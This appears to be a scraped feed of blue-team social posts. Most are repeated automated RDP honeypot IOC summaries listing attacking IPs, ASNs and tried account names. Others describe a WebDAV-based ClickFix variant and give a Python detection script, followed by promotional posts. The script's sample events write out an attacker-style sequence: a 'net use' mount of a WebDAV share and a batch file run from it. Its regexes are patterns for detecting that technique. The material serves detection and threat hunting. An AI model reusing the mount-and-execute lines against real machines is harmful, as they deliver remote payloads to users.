2026-03-21 RDP #Honeypot IOCs - 261 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 108
143.110.190.12 - 30
80.94.95.88 - 18

Top ASNs:
AS135905 - 108
AS396982 - 39
AS14061 - 30

Top Accounts:
hello - 144
Test - 36
Domain - 18

Top ISPs:
SUNSOFT - 108
Google LLC - 39
DigitalOcean, LLC - 30

Top Clients:
Unknown - 261

Top Software:
Unknown - 261

Top Keyboards:
Unknown - 261

Top IP Classification:
Unknown - 180
hosting - 75
proxy - 6

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-21 RDP #Honeypot IOCs - 174 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 72
143.110.190.12 - 20
80.94.95.88 - 12

Top ASNs:
AS135905 - 72
AS396982 - 26
AS14061 - 20

Top Accounts:
hello - 96
Test - 24
Domain - 12

Top ISPs:
SUNSOFT - 72
Google LLC - 26
DigitalOcean, LLC - 20

Top Clients:
Unknown - 174

Top Software:
Unknown - 174

Top Keyboards:
Unknown - 174

Top IP Classification:
Unknown - 120
hosting - 50
proxy - 4

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-21 RDP #Honeypot IOCs - 87 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 36
143.110.190.12 - 10
80.94.95.88 - 6

Top ASNs:
AS135905 - 36
AS396982 - 13
AS14061 - 10

Top Accounts:
hello - 48
Test - 12
Domain - 6

Top ISPs:
SUNSOFT - 36
Google LLC - 13
DigitalOcean, LLC - 10

Top Clients:
Unknown - 87

Top Software:
Unknown - 87

Top Keyboards:
Unknown - 87

Top IP Classification:
Unknown - 60
hosting - 25
proxy - 2

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Well now, a nice find for hunting season 👀

A new and very visual evolution of #ClickFix, this time relying on WebDAV to deliver the payload. (!)

It's a bit different from the usual direct PowerShell / MSHTA / WScript chains: here, initial access goes through net use, mounting the remote share, running the batch file as if it were a local file, then unmounting.

Target: Windows only.

The move is interesting: less dependence on heavily monitored interpreters/lolbins, and an abuse of WebDAV that can pass more quietly if it is not monitored.

Source of the finding: Daniel
👇
https://www.linkedin.com/posts/daniel-b1_clickfix-webdav-atos-ugcPost-7441043660613398528-98ey

Atos analysis
👇
https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variant

For those who want to enrich their detection / blocking:
the little list to nuke in your firewalls and DNS filters
👇
https://threatfox.abuse.ch/browse/tag/WebDav/

And as a bonus: a hunting / pivot recipe, as an image, via #Onyphe.

#CyberVeille #WebDav #blueteam
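One way to turn the chain described in the post (net use mount of a WebDAV share, batch file run from the mapped drive, then unmount) into detection logic, as an added example that is not part of the post, of the Atos analysis, or of any vendor product. It runs over constructed process-creation events loosely modelled on Sysmon Event ID 1 fields; the event layout, the hostnames, the `203.0.113.10` address and the script names are assumptions for the demo, not indicators from the page. The WebDAV test keys on the forms the Windows WebClient redirector uses for UNC targets (`\\host@SSL\...`, `\\host@port\...`, `\DavWWWRoot`) and on `http(s)://` targets:

```python
"""Detect the net-use WebDAV mount -> script run from the mount -> unmount sequence.

Constructed example; the sample events below are made up and not from the page.
"""
import re

# Constructed sample events (assumption: field names modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ts": 1, "host": "WS01", "user": "alice", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\203.0.113.10@80\DavWWWRoot /persistent:no"},
    {"ts": 2, "host": "WS01", "user": "alice", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c Z:\update.bat"},
    {"ts": 3, "host": "WS01", "user": "alice", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: /delete /y"},
    # Benign: an ordinary SMB home-drive mapping followed by a login script.
    {"ts": 4, "host": "WS02", "user": "bob", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use H: \\fileserver\home /persistent:yes"},
    {"ts": 5, "host": "WS02", "user": "bob", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c H:\scripts\login.bat"},
]

# WebDAV-looking targets: http(s) URLs, \\host@SSL, \\host@<port>, or a DavWWWRoot path.
WEBDAV_TARGET = re.compile(r"(?i)(?:^https?://|@ssl\b|@\d{1,5}\b|\\davwwwroot\b)")
# "net use <drive>: <UNC or URL>"  -> capture the drive letter and the target.
NET_USE_MOUNT = re.compile(r"(?i)\bnet(?:\.exe)?\s+use\s+([a-z]:)\s+(\\\\\S+|https?://\S+)")
# "net use <drive>: /delete"
NET_USE_DELETE = re.compile(r"(?i)\bnet(?:\.exe)?\s+use\s+([a-z]:)\s+/del(?:ete)?\b")


def exec_on_drive(cmdline: str, drive: str) -> bool:
    """True if the command line references a .bat/.cmd file on the given drive letter."""
    pattern = r"(?i)(?<![a-z])" + re.escape(drive) + r"\\\S*?\.(?:bat|cmd)\b"
    return re.search(pattern, cmdline) is not None


def detect(events):
    """Return one alert per (host, user, drive) where a script ran from a WebDAV mount.

    State is kept per host/user; an alert is raised at the execution step and
    marked 'unmounted' if a matching 'net use /delete' follows, which is the
    full three-step pattern the post describes.
    """
    mounts = {}   # (host, user, drive) -> {"target", "mount_ts", "alert"}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["user"])
        cmd = ev["cmdline"]

        m = NET_USE_MOUNT.search(cmd)
        if m:
            drive, target = m.group(1).upper(), m.group(2)
            if WEBDAV_TARGET.search(target):
                mounts[key + (drive,)] = {"target": target, "mount_ts": ev["ts"], "alert": None}
            else:
                # A plain SMB mapping of the same letter replaces any tracked WebDAV mount.
                mounts.pop(key + (drive,), None)
            continue

        d = NET_USE_DELETE.search(cmd)
        if d:
            info = mounts.pop(key + (d.group(1).upper(),), None)
            if info and info["alert"]:
                info["alert"]["unmounted"] = True
            continue

        for (h, u, drive), info in mounts.items():
            if (h, u) == key and exec_on_drive(cmd, drive):
                alert = {"host": h, "user": u, "drive": drive, "target": info["target"],
                         "mount_ts": info["mount_ts"], "exec_ts": ev["ts"],
                         "exec_cmd": cmd, "unmounted": False}
                info["alert"] = alert
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The benign home-drive mapping on WS02 produces no alert because its target is a plain SMB UNC path; the `@<port>` test will also fire on UNC paths that happen to contain an `@` followed by digits, so treat the mount step as an enrichment signal and the execution-from-mount step as the alertable one.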

ThreatLab routes all sandbox traffic through dedicated WireGuard exit nodes across the US, UK, Germany, and Spain. Kill switch prevents IP leaks if the tunnel drops. Your real IP never touches the malware's C2.

threatlabsandbox.com

#dfir #blueteam #malwareanalysis #infosec #sigma #sysmon #incidentresponse #blueteam

2026-03-20 RDP #Honeypot IOCs - 411 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 174
103.9.207.80 - 111
167.71.102.165 - 30

Top ASNs:
AS210558 - 174
AS135905 - 111
AS14061 - 45

Top Accounts:
hello - 147
Administrator - 87
Admin - 87

Top ISPs:
1337 Services GmbH - 174
SUNSOFT - 111
DigitalOcean, LLC - 45

Top Clients:
Unknown - 411

Top Software:
Unknown - 411

Top Keyboards:
Unknown - 411

Top IP Classification:
proxy - 180
Unknown - 147
hosting - 81

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-20 RDP #Honeypot IOCs - 274 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 116
103.9.207.80 - 74
167.71.102.165 - 20

Top ASNs:
AS210558 - 116
AS135905 - 74
AS14061 - 30

Top Accounts:
hello - 98
Administrator - 58
Admin - 58

Top ISPs:
1337 Services GmbH - 116
SUNSOFT - 74
DigitalOcean, LLC - 30

Top Clients:
Unknown - 274

Top Software:
Unknown - 274

Top Keyboards:
Unknown - 274

Top IP Classification:
proxy - 120
Unknown - 98
hosting - 54

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-20 RDP #Honeypot IOCs - 137 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 58
103.9.207.80 - 37
167.71.102.165 - 10

Top ASNs:
AS210558 - 58
AS135905 - 37
AS14061 - 15

Top Accounts:
hello - 49
Administrator - 29
Admin - 29

Top ISPs:
1337 Services GmbH - 58
SUNSOFT - 37
DigitalOcean, LLC - 15

Top Clients:
Unknown - 137

Top Software:
Unknown - 137

Top Keyboards:
Unknown - 137

Top IP Classification:
proxy - 60
Unknown - 49
hosting - 27

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Even the best IT security architecture is of little use if someone simply plugs in a manipulated charging cable. Exactly this problem was my motivation for "Hacking Hardware", a translation of my German-language book "Hardware & Security". In cybersecurity we focus heavily on networks and software, but the physical attack vector is often fatally underestimated.

In my new English-language book I show you, hands-on and in detail, how these attacks work and how to protect against them. 🧰

Whether you are on the Red Team and want to expand your arsenal, or work on the Blue Team and need to understand these vectors: this English-language book gives you the practical side. 🛠️

#RedTeam #BlueTeam #KeystrokeInjection #SDR #InfoSec #CyberSecurity #Hard

Probably just vaporware but I wanna take a look juuuuust in case.

https://www.securityweek.com/raven-emerges-from-stealth-with-20-million-in-funding/

#cloud #blueteam